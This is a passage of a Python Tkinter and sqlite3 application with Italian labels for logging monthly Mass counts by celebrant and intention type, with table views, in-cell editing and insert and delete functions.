trace_when_Entry_widget_is_updated)\nEntry_Benefattori_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\nEntry_Pro_Populo_combo_IntVar.trace_variable('w', trace_when_Entry_widget_is_updated)\n\n# List Anni\nAnni = [2020,2021,2022,2023,2024,2025,2026,2027,2028,2029,2030]\n\n# Dropbox Anno\nEntry_Anno_combo = ttk.Combobox(Frame_combo, font=(\"Helvetica\", 10), values=Anni, textvariable=Entry_Anno_combo_IntVar)\nEntry_Anno_combo.current(4)\nEntry_Anno_combo.grid(row=2, column=0)\nEntry_Anno_combo['state'] = 'readonly'\n\n\n# List Mesi\nMesi = [\"gennaio\",\n \"febbraio\",\n \"marzo\",\n \"aprile\",\n \"maggio\",\n \"giugno\",\n \"luglio\",\n \"agosto\",\n \"settembre\",\n \"ottobre\",\n \"novembre\",\n \"dicembre\",\n ]\n\n\n\n# Dropbox Mesi\n#Entry_Mese_combo = ttk.Combobox(Frame_combo, font=(\"Helvetica\", 10), values=Mesi, textvariable=Entry_Mese_combo_StringVar)\nEntry_Mese_combo = AutocompleteCombobox(Frame_combo, font=(\"Helvetica\", 10), completevalues=Mesi, textvariable=Entry_Mese_combo_StringVar)\n\nEntry_Mese_combo.current(0)\nEntry_Mese_combo.grid(row=2, column=1)\n#Entry_Mese_combo['state'] = 'readonly'\n\nconn = sqlite3.connect('database_messe_orizzontale')\ncur = conn.cursor()\nquery = \"SELECT DISTINCT (Celebranti) as Celebranti FROM TABLE_Celebranti\"\nmy_Data = cur.execute(query)\nNomi_Celebranti = [r for r, in my_Data]\nEntry_Nome_Celebrante_combo = ttk.Combobox(Frame_combo, font=(\"Helvetica\", 10), values=Nomi_Celebranti, textvariable=Entry_Nome_Celebrante_combo_StringVar)\nEntry_Nome_Celebrante_combo.current(1)\nEntry_Nome_Celebrante_combo.grid(row=2, column=2)\n# Commit changes\nconn.commit()\n# Close our connection\nconn.close()\n\nEntry_Ad_Mentem_combo = Spinbox(Frame_combo, from_=0, to=31, wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Ad_Mentem_combo_IntVar)\nEntry_Ad_Mentem_combo.grid\\\n (row=2, column=3)\nEntry_Binate_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=10, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Binate_combo_IntVar)\nEntry_Binate_combo.grid\\\n (row=2, column=4)\nEntry_Binate_Conc_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Binate_Conc_combo_IntVar)\nEntry_Binate_Conc_combo.grid\\\n (row=2, column=5)\nEntry_Trinate_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=10, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Trinate_combo_IntVar)\nEntry_Trinate_combo.grid\\\n (row=2, column=6)\nEntry_Suffragi_Comunitari_combo = Spinbox(Frame_combo, from_=0, to=31,wrap=True, width=11,font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Suffragi_Comunitari_combo_IntVar)\nEntry_Suffragi_Comunitari_combo.grid\\\n (row=2, column=7)\nEntry_Suffragi_Personali_combo = Spinbox(Frame_combo, from_=0, to=31,wrap=True, width=10,font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Suffragi_Personali_combo_IntVar)\nEntry_Suffragi_Personali_combo.grid\\\n (row=2, column=8)\nEntry_Devozione_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Devozione_combo_IntVar)\nEntry_Devozione_combo.grid\\\n (row=2, column=9)\nEntry_Benefattori_combo = Spinbox(Frame_combo, from_=0, to=31,wrap=True, width=11,font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, 
textvariable=Entry_Benefattori_combo_IntVar)\nEntry_Benefattori_combo.grid\\\n (row=2, column=10)\nEntry_Pro_Populo_combo = Spinbox(Frame_combo,from_=0, to=31,wrap=True, width=11, font=(\"Helvetica\", 12, 'bold'), bd=5, relief=GROOVE, textvariable=Entry_Pro_Populo_combo_IntVar)\nEntry_Pro_Populo_combo.grid\\\n (row=2, column=11)\n\n\n\n\n\n\n\n############################\n####### TREEVIEW ###########\n############################\n\n\n\n# Add some style\nstyle = ttk.Style()\n# Pick a theme\nstyle.theme_use(\"default\")\n\n# Configure our treeview colors\nstyle.configure(\"Treeview\",\n background=\"#D3D3D3\",\n foreground=\"black\",\n rowheight=30,\n fieldbackground=\"#D3D3D3\",\n font=('Calibri', 12)\n )\n\n# Headings\nstyle.configure(\"Treeview.Heading\",\n font=('Calibri', 12, 'bold')\n )\n\n# Change selected color\nstyle.map('Treeview',\n background=[('selected', 'blue')]\n )\n\n# Treeview Scrollbar\ntree_scroll = Scrollbar(Frame_tree)\ntree_scroll.pack(side=RIGHT, fill=Y)\n\n# Create Treeview\nmy_tree = ttk.Treeview(Frame_tree, yscrollcommand=tree_scroll.set, selectmode=\"extended\")\n# Pack to the screen\nmy_tree.pack()\n\n# Configure the scrollbar\ntree_scroll.config(command=my_tree.yview)\n\n# Define Our Columns\nmy_tree['columns'] = (\"ID\", \"Anno\", \"Mese\", \"Nome_Celebrante\", \"Ad_Mentem\", \"Binate\", \"Binate_Concelebrate\", \"Trinate\", \"Suffragi_Comunitari\", \"Suffragi_Personali\", \"Devozione\", \"Benefattori\", \"Pro_Populo\")\n\n\n\n\n\n# Formate Our Columns\nmy_tree.column(\"#0\", width=0, stretch=NO)\nmy_tree.column(\"ID\", anchor=W, width=70)\nmy_tree.column(\"Anno\", anchor=W, width=120)\nmy_tree.column(\"Mese\", anchor=W, width=120)\nmy_tree.column(\"Nome_Celebrante\", anchor=W, width=165)\nmy_tree.column(\"Ad_Mentem\", anchor=W, width=120)\nmy_tree.column(\"Binate\", anchor=W, width=120)\nmy_tree.column(\"Binate_Concelebrate\", anchor=W, width=120)\nmy_tree.column(\"Trinate\", anchor=W, width=120)\nmy_tree.column(\"Suffragi_Comunitari\", anchor=W, width=120)\nmy_tree.column(\"Suffragi_Personali\", anchor=W, width=120)\nmy_tree.column(\"Devozione\", anchor=W, width=120)\nmy_tree.column(\"Benefattori\", anchor=W, width=120)\nmy_tree.column(\"Pro_Populo\", anchor=W, width=120)\n\n\n# Create Headings\nmy_tree.heading(\"#0\", text=\"\", anchor=W)\nmy_tree.heading(\"ID\", text=\"Id\", anchor=W)\nmy_tree.heading(\"Anno\", text=\"Anno\", anchor=W)\nmy_tree.heading(\"Mese\", text=\"Mese\", anchor=W)\nmy_tree.heading(\"Nome_Celebrante\", text=\"Celebrante\", anchor=W)\nmy_tree.heading(\"Ad_Mentem\", text=\"Ad_Ment\", anchor=W)\nmy_tree.heading(\"Binate\", text=\"Binate\", anchor=W)\nmy_tree.heading(\"Binate_Concelebrate\", text=\"Bin_Concel\", anchor=W)\nmy_tree.heading(\"Trinate\", text=\"Trinate\", anchor=W)\nmy_tree.heading(\"Suffragi_Comunitari\", text=\"Suffr_Com\", anchor=W)\nmy_tree.heading(\"Suffragi_Personali\", text=\"Suffr_Pers\", anchor=W)\nmy_tree.heading(\"Devozione\", text=\"Devozione\", anchor=W)\nmy_tree.heading(\"Benefattori\", text=\"Benefattori\", anchor=W)\nmy_tree.heading(\"Pro_Populo\", text=\"Pro_Populo\", anchor=W)\n\ndef on_double_click(event):\n region_clicked = my_tree.identify_region(event.x, event.y)\n #print(region_clicked) >cell oppure >header\n\n # numero di colonna della riga su cui faccio doppio click\n column = my_tree.identify_column(event.x)\n #print(column) # esempio #4\n # numero colonna senza # davanti: numero intero\n #la prima colonna del treeview è = 1\n # sottraggo -1 perchè nelle touple primo valore è 0\n # [1:] inizia dal 
secondo carattere (dunque salta #)\n column_index = int(column[1:])-1 #COLUMN NUMBER\n #print(column_index)\n\n #gives the ID of the row that was double-clicked\n selected_iid=my_tree.focus() #ROW ID\n #print(selected_iid) #e.g. 16\n\n selected_values = my_tree.item(selected_iid) #('11', '2024', 'febbraio', 'fra Giacomo Rotunno', '0', '0', '0', '0', '0', '0', '0', '0', '0')\n\n if column_index == 0:\n selected_text = selected_values.get('text')\n #print(selected_text)\n else:\n selected_text = selected_values.get('values')[column_index]\n #print(selected_text)\n\n #position and size of the selected cell\n column_box = my_tree.bbox(selected_iid, column) #print(column) e.g. '#4'\n #print(column_box) #(1, 112, 70, 30) (x_position, y_position, Width, Height)\n\n entry_edit = ttk.Entry(Frame_tree, width=column_box[2])\n\n #store the column and row values in variables\n #Record column index and item iid\n entry_edit.editing_column_index = column_index\n #print(entry_edit.editing_column_index) # e.g. 1\n entry_edit.editing_item_iid = selected_iid\n #print(entry_edit.editing_item_id) #e.g. 9\n\n\n entry_edit.place(x = column_box[0],\n y = column_box[1],\n w = column_box[2],\n h = column_box[3])\n\n # insert the value of the selected cell\n entry_edit.insert(0, selected_text)\n #select the text\n entry_edit.select_range(0, END)\n #place the focus on the widget\n entry_edit.focus()\n\n #event.widget references the entry widget\n def on_focus_out(event):\n event.widget.destroy()\n\n #note: this only runs when you press ENTER\n def on_enter_pressed(event):\n # event.widget references the entry widget\n new_text = event.widget.get() #store the edited text in new_text\n # print('°°°°°°')\n # print(new_text)\n #We also want to know the item ID\n selected_iid = event.widget.editing_item_iid #row number\n # print('#############')\n # print(selected_iid)\n column_index = event.widget.editing_column_index #column number. the first column is 0\n # print('#############')\n # print(column_index)\n if column_index == 0: # the ID must not change\n pass\n else:\n current_values = my_tree.item(selected_iid).get(\"values\")\n #print(current_values) # [13, 2024, 'gennaio', 'Fra Alberto Dos Santos', 11, 0, 0, 0, 0, 0, 0, 0, 0]\n # {'text': '', 'image': '', 'values': [15, 2024, 'gennaio', 'Ospite', 28, 0, 0, 0, 0, 0, 0, 0, 0], 'open': 0, 'tags': ['oddrow']}\n\n #print(current_values)\n current_values[column_index]=new_text\n #print(current_values)\n my_tree.item(selected_iid, values=current_values)\n\n\n event.widget.destroy()\n\n # Update the database\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n #\n # Create a cursor instance\n c = conn.cursor()\n print(conn)\n\n c.execute(\"\"\" UPDATE TABLE_Messe \n SET\n Anno = :Anno,\n Mese = :Mese,\n Nome_Celebrante = :Nome_Celebrante,\n Ad_Mentem = :Ad_Mentem,\n Binate = :Binate,\n Binate_Concelebrate = :Binate_Concelebrate,\n Trinate = :Trinate,\n Suffragi_Comunitari = :Suffragi_Comunitari,\n Suffragi_Personali = :Suffragi_Personali,\n Devozione = :Devozione,\n Benefattori = :Benefattori,\n Pro_Populo = :Pro_Populo\n\n\n \t\t WHERE oid =\"\"\" + selected_iid,\n {\n 'Anno': current_values[1],\n 'Mese': current_values[2],\n 'Nome_Celebrante': current_values[3],\n 'Ad_Mentem': current_values[4],\n 'Binate': current_values[5],\n 'Binate_Concelebrate': current_values[6],\n 'Trinate': current_values[7],\n 'Suffragi_Comunitari': current_values[8],\n 'Suffragi_Personali': current_values[9],\n 'Devozione': current_values[10],\n 'Benefattori': current_values[11],\n 'Pro_Populo': current_values[12]\n })\n\n # Commit changes\n conn.commit()\n #\n # # Close our connection\n conn.close()\n # Add a little message box for fun\n messagebox.showinfo(\"Updated!\", \"Riga aggiornata!\")\n\n #when I click outside I want the widget to disappear\n entry_edit.bind(\"<FocusOut>\", on_focus_out)\n\n #When I click enter UPDATE tree\n entry_edit.bind(\"<Return>\", on_enter_pressed)\n\n\n\n\nmy_tree.bind(\"<Double-1>\", on_double_click)\n\n\n############################\n######## SQLITE3 ###########\n############################\n\n# Insert into TABLE_Messe\ndef submit():\n conn = sqlite3.connect('database_messe_orizzontale')\n cur = conn.cursor()\n\n #data taken from the insert combos (not the update path)\n dati = [(Entry_Anno_combo_IntVar.get(),\n Entry_Mese_combo_StringVar.get(),\n Entry_Nome_Celebrante_combo_StringVar.get(),\n Entry_Ad_Mentem_combo_IntVar.get(),\n Entry_Binate_combo_IntVar.get(),\n Entry_Binate_Conc_combo_IntVar.get(),\n Entry_Trinate_combo_IntVar.get(),\n Entry_Suffragi_Comunitari_combo_IntVar.get(),\n Entry_Suffragi_Personali_combo_IntVar.get(),\n Entry_Devozione_combo_IntVar.get(),\n Entry_Benefattori_combo_IntVar.get(),\n Entry_Pro_Populo_combo_IntVar.get()\n )]\n\n\n cur.executemany(\n 'INSERT INTO TABLE_Messe (Anno, Mese, Nome_Celebrante, Ad_Mentem, Binate, Binate_Concelebrate, Trinate, Suffragi_Comunitari, Suffragi_Personali, Devozione, Benefattori, Pro_Populo) VALUES (?,?,?,?,?,?,?,?,?,?,?,?)', dati)\n\n\n\n conn.commit()\n # Close our connection\n conn.close()\n\ndef query_database():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n sql_select_query = \"\"\"select * from TABLE_Messe where Anno = ? and Mese = ? 
order by ID DESC \"\"\"\n c.execute(sql_select_query, (2024, 'gennaio',))\n records = c.fetchall()\n # for x in records:\n # print(x)\n # print('##################################################')\n\n # c.execute(\"SELECT * FROM TABLE_Messe ORDER BY Anno, (CASE Mese\\\n # WHEN 'gennaio' THEN 1\\\n # WHEN 'febbraio' THEN 2\\\n # WHEN 'marzo' THEN 3\\\n # WHEN 'aprile' THEN 4\\\n # WHEN 'maggio' THEN 5\\\n # WHEN 'giugno' THEN 6\\\n # WHEN 'luglio' THEN 7\\\n # WHEN 'agosto' THEN 8\\\n # WHEN 'settembre' THEN 9\\\n # WHEN 'ottobre' THEN 10\\\n # WHEN 'novembre' THEN 11\\\n # WHEN 'dicembre' THEN 12\\\n # END);\")\n c.execute(\"SELECT * FROM TABLE_Messe\")\n records = c.fetchall()\n # for x in records:\n # print(x)\n\n\n # for record in records:\n # print(record)\n # record[0] = id key\n\n # COLORI RIGHE pari e dispari\n count = 0\n # Create striped row tags\n my_tree.tag_configure('oddrow', background=\"white\")\n my_tree.tag_configure('evenrow', background=\"lightblue\")\n\n for record in records:\n if count % 2 == 0:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7], record[8], record[9], record[10], record[11], record[12]),\n tags=('evenrow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8], record[9], record[10], record[11], record[12]),\n tags = ('oddrow'))\n count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\ndef query_database_BY_DATE():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # sql_select_query = \"\"\"select * from TABLE_Messe where Anno = ? and Mese = ? 
order by ID DESC \"\"\"\n # c.execute(sql_select_query, (2024, 'gennaio',))\n # records = c.fetchall()\n # for x in records:\n # print(x)\n # print('##################################################')\n\n c.execute(\"SELECT * FROM TABLE_Messe ORDER BY Anno, (CASE Mese\\\n WHEN 'gennaio' THEN 1\\\n WHEN 'febbraio' THEN 2\\\n WHEN 'marzo' THEN 3\\\n WHEN 'aprile' THEN 4\\\n WHEN 'maggio' THEN 5\\\n WHEN 'giugno' THEN 6\\\n WHEN 'luglio' THEN 7\\\n WHEN 'agosto' THEN 8\\\n WHEN 'settembre' THEN 9\\\n WHEN 'ottobre' THEN 10\\\n WHEN 'novembre' THEN 11\\\n WHEN 'dicembre' THEN 12\\\n END), Nome_Celebrante;\")\n\n records = c.fetchall()\n # for x in records:\n # print(x)\n\n\n # for record in records:\n # print(record)\n # record[0] = id key\n\n # COLORI RIGHE pari e dispari\n #count = 0\n # Create striped row tags\n my_tree.tag_configure('white', background=\"pink\")\n my_tree.tag_configure('blue', background=\"salmon\")\n my_tree.tag_configure('yellow', background=\"lightyellow\")\n my_tree.tag_configure('violet', background=\"khaki\")\n\n for record in records:\n if record[2] == 'gennaio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7], record[8], record[9], record[10], record[11], record[12]),\n tags=('white'))\n elif record[2] == 'febbraio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8], record[9], record[10], record[11], record[12]),\n tags=('blue'))\n elif record[2] == 'marzo':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('yellow'))\n elif record[2] == 'aprile':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('violet'))\n elif record[2] == 'maggio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('white'))\n elif record[2] == 'giugno':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('blue'))\n elif record[2] == 'luglio':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('yellow'))\n elif record[2] == 'agosto':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('violet'))\n elif record[2] == 'settembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('white'))\n elif record[2] == 'ottobre':\n 
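# NB: tag names and colours differ ('white'=pink, 'blue'=salmon, 'yellow'=lightyellow, 'violet'=khaki); the month branches cycle through these four tags\n 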
my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('blue'))\n\n elif record[2] == 'novembre':\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],\n record[8], record[9], record[10], record[11], record[12]),\n tags=('yellow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(record[0], record[1], record[2], record[3], record[4], record[5], record[6], record[7],record[8], record[9], record[10], record[11], record[12]),\n tags = ('violet'))\n #count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n\n\n#######################\ndef remove_one():\n # my_tree.focus() restituisce l'ID della riga selezionata\n row_id = my_tree.focus()\n my_tree.delete(row_id)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # Delete From Database\n c.execute(\"DELETE from TABLE_Messe WHERE oid =\" + row_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n # Add a little message box for fun\n messagebox.showinfo(\"Deleted\", \"Riga Cancellata!\")\n\n##############################################################\n##########TOP WINDOW CELEBRANTI###############################\n##############################################################\n\ndef Top_W_Celebranti():\n top = Toplevel()\n top.geometry(\"380x500\")\n top.title(\"Celebranti\")\n\n Frame_top_tree = Frame(top, bd='4', bg=background_Blu, relief=RIDGE)\n Frame_top_tree.pack()\n\n\n Label_Celebranti = Label(top, text='Celebranti:', font=('verdana', 8, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Celebranti.pack()\n\n Entry_Celebranti_StringVar = StringVar()\n\n Entry_Celebranti = Entry(top, bd=5, textvariable=Entry_Celebranti_StringVar)\n Entry_Celebranti.pack()\n\n \n\n ############################\n ####### TREEVIEW ###########\n ############################\n\n # Add some style\n style = ttk.Style()\n # Pick a theme\n style.theme_use(\"default\")\n\n # Configure our treeview colors\n style.configure(\"Treeview\",\n background=\"#D3D3D3\",\n foreground=\"black\",\n rowheight=30,\n fieldbackground=\"#D3D3D3\",\n font=('Calibri', 12)\n )\n\n # Headings\n style.configure(\"Treeview.Heading\",\n font=('Calibri', 12, 'bold')\n )\n\n # Change selected color\n style.map('Treeview',\n background=[('selected', 'blue')]\n )\n\n # Treeview Scrollbar\n tree_scroll = Scrollbar(Frame_top_tree)\n tree_scroll.pack(side=RIGHT, fill=Y)\n\n # Create Treeview\n my_tree = ttk.Treeview(Frame_top_tree, yscrollcommand=tree_scroll.set, selectmode=\"extended\")\n # Pack to the screen\n my_tree.pack()\n\n # Configure the scrollbar\n tree_scroll.config(command=my_tree.yview)\n\n # Define Our Columns\n my_tree['columns'] = (\"ID\", \"Celebranti\")\n\n # Formate Our Columns\n my_tree.column(\"#0\", width=0, stretch=NO)\n my_tree.column(\"ID\", anchor=W, width=70)\n my_tree.column(\"Celebranti\", anchor=W, width=200)\n\n\n # Create Headings\n my_tree.heading(\"#0\", 
text=\"\", anchor=W)\n my_tree.heading(\"ID\", text=\"Id\", anchor=W)\n my_tree.heading(\"Celebranti\", text=\"Celebranti\", anchor=W)\n\n\n\n def query_database():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n c.execute(\"SELECT * FROM TABLE_Celebranti;\")\n records = c.fetchall()\n # for x in records:\n # print('Table Messe')\n # print(x)\n\n # COLORI RIGHE pari e dispari\n count = 0\n # Create striped row tags\n my_tree.tag_configure('oddrow', background=\"white\")\n my_tree.tag_configure('evenrow', background=\"lightblue\")\n\n for record in records:\n if count % 2 == 0:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0],\n record[1]),\n tags=('evenrow'))\n else:\n my_tree.insert(parent='', index=0, iid=record[0], text='',\n values=(\n record[0],\n record[1]),\n tags=('oddrow'))\n count += 1\n\n # Al termine del processo la prima riga risulta evidenziata\n child_id = my_tree.get_children()[0] # la prima riga dall'alto del treeview\n my_tree.focus(child_id) # evidenziata\n my_tree.selection_set(child_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n def remove_one():\n # my_tree.focus() restituisce l'ID della riga selezionata\n row_id = my_tree.focus()\n my_tree.delete(row_id)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n # Delete From Database\n c.execute(\"DELETE from TABLE_Celebranti WHERE oid =\" + row_id)\n\n # Commit changes\n conn.commit()\n\n # Close our connection\n conn.close()\n\n\n def submit():\n conn = sqlite3.connect('database_messe_orizzontale')\n cur = conn.cursor()\n dati = [Entry_Celebranti_StringVar.get()]\n cur.execute('INSERT INTO TABLE_Celebranti (Celebranti) VALUES (?)', dati)\n #cur.execute(\"insert into TABLE_Celebranti (Celebranti) values ('?'), dati\")\n #cur.execute('''INSERT INTO TABLE_Celebranti (Celebranti) VALUES (\"Entry_Celebranti_StringVar.get()\")''')\n conn.commit()\n # Close our connection\n conn.close()\n\n B_add_celebranti = Button(top, text='aggiungi', width=10, command=lambda: [submit(), query_database()]).pack(side=TOP, pady=20)\n B_delete_celebranti = Button(top, text='cancella', width=10, command=remove_one).pack(side=TOP, pady=20)\n\n query_database()\n top.mainloop()\n\n\n##############################################################\n############ WINDOW Suffragi ###############################\n##############################################################\n\ndef Suffragi_Comunitari():\n\n\n Label_Titolo_Suffragi= Label(Frame_Suffragi, text='Inserire i suffragi comunitari:', font=('verdana', 12, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Titolo_Suffragi.grid(column=0,row=0, columnspan=2, sticky=\"W\")\n\n # List Anni\n Anni = [2020, 2021, 2022, 2023, 2024, 2025, 2026, 2027, 2028, 2029, 2030]\n\n Label_Anno_Suffragi = Label(Frame_Suffragi, text='Anno:', font=('verdana', 12, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Anno_Suffragi.grid(row=1, column=0, sticky=\"W\",pady=5)\n\n # Dropbox Anno\n Entry_Anno_Suffragi_StringVar = StringVar()\n Entry_Anno_Suffragi = ttk.Combobox(Frame_Suffragi, font=(\"Helvetica\", 10), values=Anni,\n textvariable=Entry_Anno_Suffragi_StringVar)\n #Entry_Anno_Suffragi.current(4)\n 
Entry_Anno_Suffragi.grid(row=1, column=1, sticky=\"W\",pady=5)\n #Entry_Anno_combo['state'] = 'readonly'\n\n # List Mesi\n Mesi = [\"gennaio\",\n \"febbraio\",\n \"marzo\",\n \"aprile\",\n \"maggio\",\n \"giugno\",\n \"luglio\",\n \"agosto\",\n \"settembre\",\n \"ottobre\",\n \"novembre\",\n \"dicembre\",\n ]\n\n Label_Mese_Suffragi= Label(Frame_Suffragi, text='Mese:', font=('verdana', 12, 'bold'), bg=background_Blu, fg=foreground_Bianco)\n Label_Mese_Suffragi.grid(column=0,row=2, sticky=\"W\", pady=5)\n\n # Dropbox Mesi\n Entry_Mese_Suffragi_StringVar = StringVar()\n Entry_Mese_Suffragi = ttk.Combobox(Frame_Suffragi, font=(\"Helvetica\", 10), values=Mesi, textvariable=Entry_Mese_Suffragi_StringVar)\n\n\n #Entry_Mese_Suffragi.current(0)\n Entry_Mese_Suffragi.grid(row=2, column=1, sticky=\"W\", pady=5)\n\n\n Label_Suffragi = Label(Frame_Suffragi, text='Suffragi:', font=('verdana', 12, 'bold'), bg=background_Blu,\n fg=foreground_Bianco)\n Label_Suffragi.grid(column=0,row=3, sticky=\"W\", pady=5)\n Entry_Suffragi_StringVar = StringVar()\n Entry_Suffragi = Entry(Frame_Suffragi, bd=5, textvariable=Entry_Suffragi_StringVar)\n Entry_Suffragi.grid(column=1, row=3, sticky=\"W\", pady=5)\n\n Frame_suffragi_tree = Frame(Frame_Suffragi, bd='4', bg=background_Blu, relief=RIDGE)\n Frame_suffragi_tree.grid(column=0, row=4, columnspan=4, pady=12, padx=2)\n\n\n ############################\n ####### TREEVIEW ###########\n ############################\n\n # Add some style\n style = ttk.Style()\n # Pick a theme\n style.theme_use(\"default\")\n\n # Configure our treeview colors\n style.configure(\"Treeview\",\n background=\"#D3D3D3\",\n foreground=\"black\",\n rowheight=30,\n fieldbackground=\"#D3D3D3\",\n font=('Calibri', 12)\n )\n\n # Headings\n style.configure(\"Treeview.Heading\",\n font=('Calibri', 12, 'bold')\n )\n\n # Change selected color\n style.map('Treeview',\n background=[('selected', 'blue')]\n )\n\n # Treeview Scrollbar\n tree_scroll = Scrollbar(Frame_suffragi_tree)\n tree_scroll.pack(side=RIGHT, fill=Y)\n\n # Create Treeview\n my_tree = ttk.Treeview(Frame_suffragi_tree, yscrollcommand=tree_scroll.set, selectmode=\"extended\", height=9)\n # Pack to the screen\n my_tree.pack()\n\n # Configure the scrollbar\n tree_scroll.config(command=my_tree.yview)\n\n # Define Our Columns\n my_tree['columns'] = (\"ID\", \"Anno\", \"Mese\", \"Suffragi\")\n\n # Formate Our Columns\n my_tree.column(\"#0\", width=0, stretch=NO)\n my_tree.column(\"ID\", anchor=W, width=40)\n my_tree.column(\"Anno\", anchor=W, width=70)\n my_tree.column(\"Mese\", anchor=W, width=70)\n my_tree.column(\"Suffragi\", anchor=W, width=250)\n\n # Create Headings\n my_tree.heading(\"#0\", text=\"\", anchor=W)\n my_tree.heading(\"ID\", text=\"Id\", anchor=W)\n my_tree.heading(\"Anno\", text=\"Anno\", anchor=W)\n my_tree.heading(\"Mese\", text=\"Mese\", anchor=W)\n my_tree.heading(\"Suffragi\", text=\"Suffragi\", anchor=W)\n\n def query_suffragi_database():\n # Clear the Treeview\n for record in my_tree.get_children():\n my_tree.delete(record)\n\n # Create a database or connect to one that exists\n conn = sqlite3.connect('database_messe_orizzontale')\n\n # Create a cursor instance\n c = conn.cursor()\n\n c.execute(\"SELECT * FROM TABLE_Suffragi;\")\n records = c.fetchall()\n for x in records:\n print('TABLE_Suffragi')\n print(x)\n #\n # COLORI RIGHE pari e dispari\n count = 0\n # Create striped row tags\n my_tree.tag_configure('oddrow', background=\"white\")\n my_tree.tag_configure('evenrow', background=\"lightblue\")\n\n for record in 
